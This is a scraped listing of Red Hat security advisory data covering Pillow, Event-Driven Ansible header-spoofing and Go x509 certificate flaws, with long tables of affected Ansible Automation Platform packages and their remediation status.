"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Native heap out-of-bounds write"
}
]
}
RHSA-2026:50319
Vulnerability from csaf_redhat - Published: 2026-08-04 18:10 - Updated: 2026-08-05 04:56A flaw was found in the Event-Driven Ansible (EDA) server. The ExternalEventStreamViewSet uses permissive access controls (permission_classes=[AllowAny], authentication_classes=[]) and relies solely on the Subject HTTP header value for mTLS authentication without verifying that the header originated from a trusted proxy. Additionally, the expected certificate Distinguished Name is leaked in the 403 error response body. An attacker who can reach the EDA API endpoint with a spoofed Subject header can inject arbitrary events into mTLS-protected event streams, triggering downstream automation actions.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in the `crypto/x509` package of `golang`. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by presenting a specially crafted X.509 certificate with a large number of DNS Subject Alternative Name (SAN) entries. The certificate verification process, specifically the `VerifyHostname` function, incurs excessive computational overhead due to repeated string operations when processing these entries. This can lead to a significant performance degradation or unresponsiveness of systems validating such certificates.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — |
